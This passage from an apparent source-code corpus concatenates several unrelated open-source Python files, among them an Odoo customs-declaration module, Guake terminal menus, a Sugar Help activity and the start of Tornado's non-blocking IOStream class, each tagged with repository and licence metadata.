res = sock.execute(DB, USERID, USERPASS, 'is.deb.synthese', 'read', ids, fields)
for vals in res:
vals.update({'deb_id':obj.id})
created=self.env['is.deb.synthese'].create(vals)
obj.state='termine'
return {
'name': u'Synthèse DEB',
'view_mode': 'tree,form',
'view_type': 'form',
'res_model': 'is.deb.synthese',
'domain': [
('deb_id' ,'=', obj.id),
],
'context': {
'default_deb_id' : obj.id,
},
'type': 'ir.actions.act_window',
'limit': 1000,
}
@api.multi
def lignes_deb_action(self):
for obj in self:
return {
'name': u'Lignes DEB',
'view_mode': 'tree,form',
'view_type': 'form',
'res_model': 'is.deb.line',
'domain': [
('deb_id' ,'=', obj.id),
],
'context': {
'default_deb_id' : obj.id,
},
'type': 'ir.actions.act_window',
'limit': 1000,
}
@api.multi
def synthese_lignes_action(self):
for obj in self:
return {
'name': u'Synthèse DEB',
'view_mode': 'tree,form',
'view_type': 'form',
'res_model': 'is.deb.synthese',
'domain': [
('deb_id' ,'=', obj.id),
],
'context': {
'default_deb_id' : obj.id,
},
'type': 'ir.actions.act_window',
'limit': 1000,
}
class is_deb_line(models.Model):
_name='is.deb.line'
_order='deb_id,type_deb,invoice_id'
deb_id = fields.Many2one('is.deb', "DEB", required=True, ondelete='cascade')
type_deb = fields.Selection([('introduction', u'Introduction'),('exportation', u'Exportation')], u"Type de DEB", required=True, select=True)
invoice_id = fields.Many2one('account.invoice', 'Facture')
num_facture = fields.Char("N° de facture")
date_facture = fields.Date("Date facture")
type_facture = fields.Char("Type de facture")
partner_id = fields.Many2one('res.partner', 'Client livré / Fournisseur')
code_regime = fields.Char("Code régime")
nomenclature_douaniere = fields.Char("Nomenclature douaniere")
masse_nette = fields.Float("Masse nette")
pays_origine = fields.Char("Pays d'origine" , help="Pays d'origine indiqué dans la fiche article")
pays_destination = fields.Char("Pays de destination", help="Pays de destination du client livré")
valeur_fiscale = fields.Float("Valeur fiscale" , help="Montant net facturé")
nature_transaction = fields.Char("Nature de la transaction")
mode_transport = fields.Char("Mode de transport")
departement_expedition = fields.Char("Département d'expédition", help="2 premiers chiffres du code postal du client livré")
num_tva = fields.Char("N°TVA du client livré")
_defaults = {
'code_regime' : '21',
'nature_transaction': '11',
'mode_transport' : '3',
}
class is_deb_synthese(models.Model):
_name='is.deb.synthese'
_order='deb_id,type_deb,num_facture'
deb_id = fields.Many2one('is.deb', "DEB", required=True, ondelete='cascade')
type_deb = fields.Selection([('introduction', u'Introduction'),('exportation', u'Exportation')], u"Type de DEB", required=True, select=True)
num_facture = fields.Char("N° de facture")
date_facture = fields.Date("Date facture")
code_regime = fields.Char("Code régime")
nomenclature_douaniere = fields.Char("Nomenclature douaniere")
masse_nette = fields.Float("Masse nette")
pays_destination = fields.Char("Pays", help="Pays de destination du client livré ou Pays d'expédition pour les fournisseurs")
valeur_fiscale = fields.Float("Valeur fiscale" , help="Montant net facturé")
nature_transaction = fields.Char("Nature de la transaction")
mode_transport = fields.Char("Mode de transport")
departement_expedition = fields.Char("Département d'expédition", help="2 premiers chiffres du code postal du client livré")
num_tva = fields.Char("N°TVA du client livré")
_defaults = {
'code_regime' : '21',
'nature_transaction': '11',
'mode_transport' : '3',
}
| mit | 1,110,925,696,740,326,300 | 40.382429 | 170 | 0.446831 | false |
xuru/pyvisdk | pyvisdk/do/host_disk_partition_block_range.py | 1 | 1172 |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def HostDiskPartitionBlockRange(vim, *args, **kwargs):
'''A BlockRange data object type describes a contiguous set of blocks on a disk. A
BlockRange may describe either a partition or unpartitioned (primordial) blocks
on the disk.'''
obj = vim.client.factory.create('ns0:HostDiskPartitionBlockRange')
# do some validation checking...
if (len(args) + len(kwargs)) < 3:
raise IndexError('Expected at least 4 arguments got: %d' % len(args))
required = [ 'end', 'start', 'type' ]
optional = [ 'partition', 'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
| mit | -7,647,620,304,849,531,000 | 32.514286 | 124 | 0.616041 | false |
GunioRobot/feed2dent | f2dlibs/jfilters.py | 1 | 1319 | """
archbot library
this package contains the following methods:
tighturlify -- Method to turn a url into a bit.ly shortened url.
mkdent -- Method to post data to identica.
"""
###
### imports
import sys
import re
import urllib
import urllib2
import logging
from jinja2 import Markup
###
### conditional imports
try: import lxml
except ImportError:
print "Could not import lxml"
sys.exit(1)
###
### method defs
def _tighturlify(apiurl, url):
"""use tighturl to shorten a url and return the shorter version"""
logger = logging.getLogger('botlibs.tighturl.ify')
## prepare the connection requirements
request = urllib2.Request('%s%s' % (apiurl, url))
request.add_header('User-agent', 'archbot/1.0')
logger.debug('performaing tighturl request')
response = urllib2.urlopen(request)
from lxml.html import parse
logger.debug('parsing response html')
doc = parse(response)
page = doc.getroot()
try:
tighturl = page.forms[0].fields['tighturl']
except KeyError:
# not where it is expected to be.
tighturl = None
logger.debug('got url: "%s"', tighturl)
return tighturl
def shortenurl(value):
safevalue = Markup(value).striptags()
shorturl = _tighturlify('http://2tu.us/?save=y&url=', safevalue)
return shorturl
| bsd-3-clause | 2,463,794,963,521,435,000 | 23.886792 | 70 | 0.680061 | false |
debian-live/live-magic | DebianLive/elements/key_var.py | 1 | 4537 | # -*- coding: utf-8 -*-
#
# live-magic - GUI frontend to create Debian LiveCDs, etc.
# Copyright (C) 2007-2010 Chris Lamb <lamby@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
import os
from DebianLive.utils import ListObserver
SHELL_ESCAPES = (
(r'\ '[:-1], r'\\ '[:-1]),
(r'"', r'\"'),
(r'`', r'\`'),
(r'$', r'\$'),
(r"'", r'\''),
)
REGEX = re.compile(r"""^\s*(\w+)=(?:(["\'])(([^\\\2]|\\.)*|)\2|((\w|\\["'])*))\s*(?:#.*)?$""")
class KeyVar(dict):
'''
Represents a POSIX shell KEY="VAR" configuration file.
'''
def __new__(cls, *args, **kwargs):
return dict.__new__(cls, *args, **kwargs)
def __init__(self, dir, name, spec, filename=None):
self.line_numbers = {}
self.stale = set()
if filename is None:
self.filename = os.path.join(dir, 'config', name)
else:
self.filename = filename
f = open(self.filename, 'r')
try:
line_no = 0
for line in f:
line_no += 1
# Check and parse key=value lines
match = REGEX.match(line)
if not match:
continue
key = match.groups()[0]
# Find the correct match group
for m in match.groups()[2:]:
if m is not None:
val = m
break
# Unescape value
for to, from_ in SHELL_ESCAPES:
val = val.replace(from_, to)
# Save line number
self.line_numbers[key] = line_no
# Mutate to file type
val_type = spec.get(key, str)
typed_val = {
int: lambda k, v: {'': None}.get(v, None),
list: lambda k, v: ListObserver(v.split(), lambda: self.stale.add(k)),
str: lambda k, v: v,
bool: lambda k, v: {'true' : True, 'false' : False, \
'yes' : True, 'no' : False}.get(v, None),
}[val_type](key, val)
# Save value
dict.__setitem__(self, key, typed_val)
finally:
f.close()
def __setitem__(self, key, value):
self.stale.add(key)
if type(value) is list:
value = ListObserver(value, lambda: self.stale.add(key))
dict.__setitem__(self, key, value)
def save(self):
"""
Update all updated entries in the file.
"""
if len(self.stale) == 0:
return
f = open(self.filename, 'r+')
lines = f.readlines()
for k in self.stale:
val = self[k]
# Escape value
if type(val) in (list, ListObserver):
for from_, to in SHELL_ESCAPES:
val = map(lambda x: x.replace(from_, to), val)
val = map(str.strip, val)
elif type(val) is str:
for from_, to in SHELL_ESCAPES:
val = val.replace(from_, to)
# Format value depending on its type
line_value = {
list : lambda v: " ".join(val),
bool : lambda v: {True: 'true', False: 'false'}.get(val, None),
str : lambda v: v,
type(None) : lambda v: "",
}[type(val)](val)
line = '%s="%s"\n' % (k, line_value)
try:
# Overwrite original line in file
lines[self.line_numbers[k] - 1] = line
except KeyError:
# Append line to end of file
lines.append("\n# The following option was added by live-magic\n")
lines.append(line)
f.close()
f = open(self.filename, 'w')
f.writelines(lines)
f.close()
self.stale = set()
| gpl-3.0 | -5,428,471,877,226,425,000 | 30.506944 | 94 | 0.486445 | false |
quozl/help-activity | helpactivity.py | 1 | 7190 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import json
from gettext import gettext as _
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('WebKit', '3.0')
from gi.repository import Gtk
from gi.repository import GObject
from gi.repository import WebKit
from sugar3.activity import activity
from sugar3.graphics.toolbutton import ToolButton
from sugar3.graphics.toolbarbox import ToolbarBox
from sugar3.graphics.toolbarbox import ToolbarButton
from sugar3.activity.widgets import ActivityToolbarButton
from sugar3.activity.widgets import StopButton
from viewtoolbar import ViewToolbar
def get_current_language():
locale = os.environ.get('LANG')
return locale.split('.')[0].split('_')[0].lower()
def get_index_uri():
index_path = os.path.join(
activity.get_bundle_path(),
'html/%s/index.html' % get_current_language())
if not os.path.isfile(index_path):
index_path = os.path.join(
activity.get_bundle_path(), 'html/index.html')
return 'file://' + index_path
class HelpActivity(activity.Activity):
def __init__(self, handle):
activity.Activity.__init__(self, handle)
self.props.max_participants = 1
self._web_view = WebKit.WebView()
self._web_view.set_full_content_zoom(True)
_scrolled_window = Gtk.ScrolledWindow()
_scrolled_window.add(self._web_view)
_scrolled_window.show()
toolbar_box = ToolbarBox()
activity_button = ActivityToolbarButton(self)
toolbar_box.toolbar.insert(activity_button, 0)
activity_button.show()
viewtoolbar = ViewToolbar(self)
viewbutton = ToolbarButton(page=viewtoolbar,
icon_name='toolbar-view')
toolbar_box.toolbar.insert(viewbutton, -1)
viewbutton.show()
separator = Gtk.SeparatorToolItem()
toolbar_box.toolbar.insert(separator, -1)
separator.show()
# lets reuse the code below
navtoolbar = Toolbar(self._web_view)
toolitem = Gtk.ToolItem()
navtoolbar._home.reparent(toolitem)
toolbar_box.toolbar.insert(toolitem, -1)
navtoolbar._home.show()
toolitem.show()
toolitem = Gtk.ToolItem()
navtoolbar._back.reparent(toolitem)
toolbar_box.toolbar.insert(toolitem, -1)
navtoolbar._back.show()
toolitem.show()
toolitem = Gtk.ToolItem()
navtoolbar._forward.reparent(toolitem)
toolbar_box.toolbar.insert(toolitem, -1)
navtoolbar._forward.show()
toolitem.show()
# we do not have collaboration features
# make the share option insensitive
self.max_participants = 1
separator = Gtk.SeparatorToolItem()
separator.props.draw = False
separator.set_expand(True)
toolbar_box.toolbar.insert(separator, -1)
separator.show()
stop_button = StopButton(self)
toolbar_box.toolbar.insert(stop_button, -1)
stop_button.show()
self.set_toolbar_box(toolbar_box)
toolbar_box.show()
self.set_canvas(_scrolled_window)
self._web_view.show()
self._web_view.connect("resource-request-starting",
self._resource_request_starting_cb)
self._web_view.load_uri(get_index_uri())
def _resource_request_starting_cb(self, webview, web_frame, web_resource,
request, response):
uri = web_resource.get_uri()
if uri.find('_images') > -1:
if uri.find('/%s/_images/' % get_current_language()) > -1:
new_uri = uri.replace('/html/%s/_images/' %
get_current_language(),
'/images/')
else:
new_uri = uri.replace('/html/_images/', '/images/')
request.set_uri(new_uri)
def get_document_path(self, async_cb, async_err_cb):
html_uri = self._web_view.get_uri()
rst_path = html_uri.replace('file:///', '/')
rst_path = rst_path.replace('html/', 'source/')
rst_path = rst_path.replace('.html', '.rst')
tmp_path = os.path.join(activity.get_activity_root(), 'instance',
'source.rst')
os.symlink(rst_path, tmp_path)
async_cb(tmp_path)
def read_file(self, file_path):
f = open(file_path, "r")
data = json.load(f)
self._web_view.load_uri(data['current_page'])
self._web_view.set_zoom_level(data['zoom_level'])
f.close()
def write_file(self, file_path):
"""
Save the current uri, zoom level for load it in the next startup.
"""
html_uri = self._web_view.get_uri()
zoom_level = self._web_view.get_zoom_level()
data = {'current_page': html_uri, 'zoom_level': zoom_level}
f = open(file_path, "w")
json.dump(data, f)
f.close()
class Toolbar(Gtk.Toolbar):
def __init__(self, web_view):
GObject.GObject.__init__(self)
self._web_view = web_view
self._back = ToolButton('go-previous-paired')
self._back.set_tooltip(_('Back'))
self._back.props.sensitive = False
self._back.connect('clicked', self._go_back_cb)
self.insert(self._back, -1)
self._back.show()
self._forward = ToolButton('go-next-paired')
self._forward.set_tooltip(_('Forward'))
self._forward.props.sensitive = False
self._forward.connect('clicked', self._go_forward_cb)
self.insert(self._forward, -1)
self._forward.show()
self._home = ToolButton('go-home')
self._home.set_tooltip(_('Home'))
self._home.connect('clicked', self._go_home_cb)
self.insert(self._home, -1)
self._home.show()
self._web_view.connect('notify::uri', self._uri_changed_cb)
def _uri_changed_cb(self, progress_listener, uri):
self.update_navigation_buttons()
def _loading_stop_cb(self, progress_listener):
self.update_navigation_buttons()
def update_navigation_buttons(self):
self._back.props.sensitive = self._web_view.can_go_back()
self._forward.props.sensitive = self._web_view.can_go_forward()
def _go_back_cb(self, button):
self._web_view.go_back()
def _go_forward_cb(self, button):
self._web_view.go_forward()
def _go_home_cb(self, button):
self._web_view.load_uri(get_index_uri())
| gpl-3.0 | -5,766,782,719,864,932,000 | 32.915094 | 77 | 0.614604 | false |
Stibbons/guake | guake/menus.py | 1 | 7649 | import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
from locale import gettext as _
gi.require_version('Vte', '2.91') # vte-0.42
from gi.repository import Vte
from guake.customcommands import CustomCommands
import logging
log = logging.getLogger(__name__)
def mk_tab_context_menu(callback_object):
"""Create the context menu for a notebook tab
"""
# Store the menu in a temp variable in terminal so that popup() is happy. See:
# https://stackoverflow.com/questions/28465956/
callback_object.context_menu = Gtk.Menu()
menu = callback_object.context_menu
mi_new_tab = Gtk.MenuItem(_("New Tab"))
mi_new_tab.connect("activate", callback_object.on_new_tab)
menu.add(mi_new_tab)
mi_rename = Gtk.MenuItem(_("Rename"))
mi_rename.connect("activate", callback_object.on_rename)
menu.add(mi_rename)
mi_reset_custom_colors = Gtk.MenuItem(_("Reset custom colors"))
mi_reset_custom_colors.connect("activate", callback_object.on_reset_custom_colors)
menu.add(mi_reset_custom_colors)
mi_close = Gtk.MenuItem(_("Close"))
mi_close.connect("activate", callback_object.on_close)
menu.add(mi_close)
menu.show_all()
return menu
def mk_notebook_context_menu(callback_object):
"""Create the context menu for the notebook
"""
callback_object.context_menu = Gtk.Menu()
menu = callback_object.context_menu
mi = Gtk.MenuItem(_("New Tab"))
mi.connect("activate", callback_object.on_new_tab)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Save Tabs"))
mi.connect("activate", callback_object.on_save_tabs)
menu.add(mi)
mi = Gtk.MenuItem(_("Restore Tabs"))
mi.connect("activate", callback_object.on_restore_tabs_with_dialog)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.ImageMenuItem("gtk-preferences")
mi.set_use_stock(True)
mi.connect("activate", callback_object.on_show_preferences)
menu.add(mi)
mi = Gtk.ImageMenuItem("gtk-about")
mi.set_use_stock(True)
mi.connect("activate", callback_object.on_show_about)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Quit"))
mi.connect("activate", callback_object.on_quit)
menu.add(mi)
menu.show_all()
return menu
SEARCH_SELECTION_LENGTH = 20
FILE_SELECTION_LENGTH = 30
def mk_terminal_context_menu(terminal, window, settings, callback_object):
"""Create the context menu for a terminal.
"""
# Store the menu in a temp variable in terminal so that popup() is happy. See:
# https://stackoverflow.com/questions/28465956/
terminal.context_menu = Gtk.Menu()
menu = terminal.context_menu
mi = Gtk.MenuItem(_("Copy"))
mi.connect("activate", callback_object.on_copy_clipboard)
menu.add(mi)
if get_link_under_cursor(terminal) is not None:
mi = Gtk.MenuItem(_("Copy Url"))
mi.connect("activate", callback_object.on_copy_url_clipboard)
menu.add(mi)
mi = Gtk.MenuItem(_("Paste"))
mi.connect("activate", callback_object.on_paste_clipboard)
# check if clipboard has text, if not disable the paste menuitem
clipboard = Gtk.Clipboard.get_default(window.get_display())
mi.set_sensitive(clipboard.wait_is_text_available())
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Toggle Fullscreen"))
mi.connect("activate", callback_object.on_toggle_fullscreen)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Split ―"))
mi.connect("activate", callback_object.on_split_horizontal)
menu.add(mi)
mi = Gtk.MenuItem(_("Split |"))
mi.connect("activate", callback_object.on_split_vertical)
menu.add(mi)
mi = Gtk.MenuItem(_("Close terminal"))
mi.connect("activate", callback_object.on_close_terminal)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Save content..."))
mi.connect("activate", callback_object.on_save_to_file)
menu.add(mi)
mi = Gtk.MenuItem(_("Reset terminal"))
mi.connect("activate", callback_object.on_reset_terminal)
menu.add(mi)
# TODO SEARCH uncomment menu.add()
mi = Gtk.MenuItem(_("Find..."))
mi.connect("activate", callback_object.on_find)
# menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Open link..."))
mi.connect("activate", callback_object.on_open_link)
link = get_link_under_cursor(terminal)
# TODO CONTEXTMENU this is a mess Quick open should also be sensible
# if the text in the selection is a url the current terminal
# implementation does not support this at the moment
if link:
if len(link) >= FILE_SELECTION_LENGTH:
mi.set_label(_("Open Link: {!s}...").format(link[:FILE_SELECTION_LENGTH - 3]))
else:
mi.set_label(_("Open Link: {!s}").format(link))
mi.set_sensitive(True)
else:
mi.set_sensitive(False)
menu.add(mi)
mi = Gtk.MenuItem(_("Search on Web"))
mi.connect("activate", callback_object.on_search_on_web)
selection = get_current_selection(terminal, window)
if selection:
search_text = selection.rstrip()
if len(search_text) > SEARCH_SELECTION_LENGTH:
search_text = search_text[:SEARCH_SELECTION_LENGTH - 3] + "..."
mi.set_label(_("Search on Web: '%s'") % search_text)
mi.set_sensitive(True)
else:
mi.set_sensitive(False)
menu.add(mi)
mi = Gtk.MenuItem(_("Quick Open..."))
mi.connect("activate", callback_object.on_quick_open)
if selection:
filename = get_filename_under_cursor(terminal, selection)
if filename:
filename_str = str(filename)
if len(filename_str) > FILE_SELECTION_LENGTH:
mi.set_label(
_("Quick Open: {!s}...").format(filename_str[:FILE_SELECTION_LENGTH - 3])
)
else:
mi.set_label(_("Quick Open: {!s}").format(filename_str))
mi.set_sensitive(True)
else:
mi.set_sensitive(False)
else:
mi.set_sensitive(False)
menu.add(mi)
customcommands = CustomCommands(settings, callback_object)
if customcommands.should_load():
submen = customcommands.build_menu()
if submen:
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.MenuItem(_("Custom Commands"))
mi.set_submenu(submen)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.ImageMenuItem("gtk-preferences")
mi.set_use_stock(True)
mi.connect("activate", callback_object.on_show_preferences)
menu.add(mi)
mi = Gtk.ImageMenuItem("gtk-about")
mi.set_use_stock(True)
mi.connect("activate", callback_object.on_show_about)
menu.add(mi)
menu.add(Gtk.SeparatorMenuItem())
mi = Gtk.ImageMenuItem(_("Quit"))
mi.connect("activate", callback_object.on_quit)
menu.add(mi)
menu.show_all()
return menu
def get_current_selection(terminal, window):
if terminal.get_has_selection():
terminal.copy_clipboard()
clipboard = Gtk.Clipboard.get_default(window.get_display())
return clipboard.wait_for_text()
return None
def get_filename_under_cursor(terminal, selection):
filename, _1, _2 = terminal.is_file_on_local_server(selection)
log.info("Current filename under cursor: %s", filename)
if filename:
return filename
return None
def get_link_under_cursor(terminal):
link = terminal.found_link
log.info("Current link under cursor: %s", link)
if link:
return link
return None
| gpl-2.0 | 5,360,948,063,324,771,000 | 35.578947 | 93 | 0.649706 | false |
jetskijoe/SickGear | lib/tornado/iostream.py | 1 | 65232 | #!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utility classes to write to and read from non-blocking files and sockets.
Contents:
* `BaseIOStream`: Generic interface for reading and writing.
* `IOStream`: Implementation of BaseIOStream using non-blocking sockets.
* `SSLIOStream`: SSL-aware version of IOStream.
* `PipeIOStream`: Pipe-based IOStream implementation.
"""
from __future__ import absolute_import, division, print_function, with_statement
import collections
import errno
import numbers
import os
import socket
import sys
import re
from tornado.concurrent import TracebackFuture
from tornado import ioloop
from tornado.log import gen_log, app_log
from tornado.netutil import ssl_wrap_socket, ssl_match_hostname, SSLCertificateError, _client_ssl_defaults, _server_ssl_defaults
from tornado import stack_context
from tornado.util import errno_from_exception
try:
from tornado.platform.posix import _set_nonblocking
except ImportError:
_set_nonblocking = None
try:
import ssl
except ImportError:
# ssl is not available on Google App Engine
ssl = None
# These errnos indicate that a non-blocking operation must be retried
# at a later time. On most platforms they're the same value, but on
# some they differ.
_ERRNO_WOULDBLOCK = (errno.EWOULDBLOCK, errno.EAGAIN)
if hasattr(errno, "WSAEWOULDBLOCK"):
_ERRNO_WOULDBLOCK += (errno.WSAEWOULDBLOCK,) # type: ignore
# These errnos indicate that a connection has been abruptly terminated.
# They should be caught and handled less noisily than other errors.
_ERRNO_CONNRESET = (errno.ECONNRESET, errno.ECONNABORTED, errno.EPIPE,
errno.ETIMEDOUT)
if hasattr(errno, "WSAECONNRESET"):
_ERRNO_CONNRESET += (errno.WSAECONNRESET, errno.WSAECONNABORTED, errno.WSAETIMEDOUT) # type: ignore
if sys.platform == 'darwin':
# OSX appears to have a race condition that causes send(2) to return
# EPROTOTYPE if called while a socket is being torn down:
# http://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
# Since the socket is being closed anyway, treat this as an ECONNRESET
# instead of an unexpected error.
_ERRNO_CONNRESET += (errno.EPROTOTYPE,) # type: ignore
# More non-portable errnos:
_ERRNO_INPROGRESS = (errno.EINPROGRESS,)
if hasattr(errno, "WSAEINPROGRESS"):
_ERRNO_INPROGRESS += (errno.WSAEINPROGRESS,) # type: ignore
class StreamClosedError(IOError):
"""Exception raised by `IOStream` methods when the stream is closed.
Note that the close callback is scheduled to run *after* other
callbacks on the stream (to allow for buffered data to be processed),
so you may see this error before you see the close callback.
The ``real_error`` attribute contains the underlying error that caused
the stream to close (if any).
.. versionchanged:: 4.3
Added the ``real_error`` attribute.
"""
def __init__(self, real_error=None):
super(StreamClosedError, self).__init__('Stream is closed')
self.real_error = real_error
class UnsatisfiableReadError(Exception):
"""Exception raised when a read cannot be satisfied.
Raised by ``read_until`` and ``read_until_regex`` with a ``max_bytes``
argument.
"""
pass
class StreamBufferFullError(Exception):
"""Exception raised by `IOStream` methods when the buffer is full.
"""
class BaseIOStream(object):
"""A utility class to write to and read from a non-blocking file or socket.
We support a non-blocking ``write()`` and a family of ``read_*()`` methods.
All of the methods take an optional ``callback`` argument and return a
`.Future` only if no callback is given. When the operation completes,
the callback will be run or the `.Future` will resolve with the data
read (or ``None`` for ``write()``). All outstanding ``Futures`` will
resolve with a `StreamClosedError` when the stream is closed; users
of the callback interface will be notified via
`.BaseIOStream.set_close_callback` instead.
When a stream is closed due to an error, the IOStream's ``error``
attribute contains the exception object.
Subclasses must implement `fileno`, `close_fd`, `write_to_fd`,
`read_from_fd`, and optionally `get_fd_error`.
"""
def __init__(self, io_loop=None, max_buffer_size=None,
read_chunk_size=None, max_write_buffer_size=None):
"""`BaseIOStream` constructor.
:arg io_loop: The `.IOLoop` to use; defaults to `.IOLoop.current`.
Deprecated since Tornado 4.1.
:arg max_buffer_size: Maximum amount of incoming data to buffer;
defaults to 100MB.
:arg read_chunk_size: Amount of data to read at one time from the
underlying transport; defaults to 64KB.
:arg max_write_buffer_size: Amount of outgoing data to buffer;
defaults to unlimited.
.. versionchanged:: 4.0
Add the ``max_write_buffer_size`` parameter. Changed default
``read_chunk_size`` to 64KB.
"""
self.io_loop = io_loop or ioloop.IOLoop.current()
self.max_buffer_size = max_buffer_size or 104857600
# A chunk size that is too close to max_buffer_size can cause
# spurious failures.
self.read_chunk_size = min(read_chunk_size or 65536,
self.max_buffer_size // 2)
self.max_write_buffer_size = max_write_buffer_size
self.error = None
self._read_buffer = collections.deque()
self._write_buffer = collections.deque()
self._read_buffer_size = 0
self._write_buffer_size = 0
self._write_buffer_frozen = False
self._read_delimiter = None
self._read_regex = None
self._read_max_bytes = None
self._read_bytes = None
self._read_partial = False
self._read_until_close = False
self._read_callback = None
self._read_future = None
self._streaming_callback = None
self._write_callback = None
self._write_future = None
self._close_callback = None
self._connect_callback = None
self._connect_future = None
# _ssl_connect_future should be defined in SSLIOStream
# but it's here so we can clean it up in maybe_run_close_callback.
# TODO: refactor that so subclasses can add additional futures
# to be cancelled.
self._ssl_connect_future = None
self._connecting = False
self._state = None
self._pending_callbacks = 0
self._closed = False
def fileno(self):
"""Returns the file descriptor for this stream."""
raise NotImplementedError()
def close_fd(self):
"""Closes the file underlying this stream.
``close_fd`` is called by `BaseIOStream` and should not be called
elsewhere; other users should call `close` instead.
"""
raise NotImplementedError()
def write_to_fd(self, data):
"""Attempts to write ``data`` to the underlying file.
Returns the number of bytes written.
"""
raise NotImplementedError()
def read_from_fd(self):
"""Attempts to read from the underlying file.
Returns ``None`` if there was nothing to read (the socket
returned `~errno.EWOULDBLOCK` or equivalent), otherwise
returns the data. When possible, should return no more than
``self.read_chunk_size`` bytes at a time.
"""
raise NotImplementedError()
def get_fd_error(self):
"""Returns information about any error on the underlying file.
This method is called after the `.IOLoop` has signaled an error on the
file descriptor, and should return an Exception (such as `socket.error`
with additional information, or None if no such information is
available.
"""
return None
def read_until_regex(self, regex, callback=None, max_bytes=None):
"""Asynchronously read until we have matched the given regex.
The result includes the data that matches the regex and anything
that came before it. If a callback is given, it will be run
with the data as an argument; if not, this method returns a
`.Future`.
If ``max_bytes`` is not None, the connection will be closed
if more than ``max_bytes`` bytes have been read and the regex is
not satisfied.
.. versionchanged:: 4.0
Added the ``max_bytes`` argument. The ``callback`` argument is
now optional and a `.Future` will be returned if it is omitted.
"""
future = self._set_read_callback(callback)
self._read_regex = re.compile(regex)
self._read_max_bytes = max_bytes
try:
self._try_inline_read()
except UnsatisfiableReadError as e:
# Handle this the same way as in _handle_events.
gen_log.info("Unsatisfiable read, closing connection: %s" % e)
self.close(exc_info=True)
return future
except:
if future is not None:
# Ensure that the future doesn't log an error because its
# failure was never examined.
future.add_done_callback(lambda f: f.exception())
raise
return future
def read_until(self, delimiter, callback=None, max_bytes=None):
"""Asynchronously read until we have found the given delimiter.
The result includes all the data read including the delimiter.
If a callback is given, it will be run with the data as an argument;
if not, this method returns a `.Future`.
If ``max_bytes`` is not None, the connection will be closed
if more than ``max_bytes`` bytes have been read and the delimiter
is not found.
.. versionchanged:: 4.0
Added the ``max_bytes`` argument. The ``callback`` argument is
now optional and a `.Future` will be returned if it is omitted.
"""
future = self._set_read_callback(callback)
self._read_delimiter = delimiter
self._read_max_bytes = max_bytes
try:
self._try_inline_read()
except UnsatisfiableReadError as e:
# Handle this the same way as in _handle_events.
gen_log.info("Unsatisfiable read, closing connection: %s" % e)
self.close(exc_info=True)
return future
except:
if future is not None:
future.add_done_callback(lambda f: f.exception())
raise
return future
def read_bytes(self, num_bytes, callback=None, streaming_callback=None,
partial=False):
"""Asynchronously read a number of bytes.
If a ``streaming_callback`` is given, it will be called with chunks
of data as they become available, and the final result will be empty.
Otherwise, the result is all the data that was read.
If a callback is given, it will be run with the data as an argument;
if not, this method returns a `.Future`.
If ``partial`` is true, the callback is run as soon as we have
any bytes to return (but never more than ``num_bytes``)
.. versionchanged:: 4.0
Added the ``partial`` argument. The callback argument is now
optional and a `.Future` will be returned if it is omitted.
"""
future = self._set_read_callback(callback)
assert isinstance(num_bytes, numbers.Integral)
self._read_bytes = num_bytes
self._read_partial = partial
self._streaming_callback = stack_context.wrap(streaming_callback)
try:
self._try_inline_read()
except:
if future is not None:
future.add_done_callback(lambda f: f.exception())
raise
return future
def read_until_close(self, callback=None, streaming_callback=None):
"""Asynchronously reads all data from the socket until it is closed.
If a ``streaming_callback`` is given, it will be called with chunks
of data as they become available, and the final result will be empty.
Otherwise, the result is all the data that was read.
If a callback is given, it will be run with the data as an argument;
if not, this method returns a `.Future`.
Note that if a ``streaming_callback`` is used, data will be
read from the socket as quickly as it becomes available; there
is no way to apply backpressure or cancel the reads. If flow
control or cancellation are desired, use a loop with
`read_bytes(partial=True) <.read_bytes>` instead.
.. versionchanged:: 4.0
The callback argument is now optional and a `.Future` will
be returned if it is omitted.
"""
future = self._set_read_callback(callback)
self._streaming_callback = stack_context.wrap(streaming_callback)
if self.closed():
if self._streaming_callback is not None:
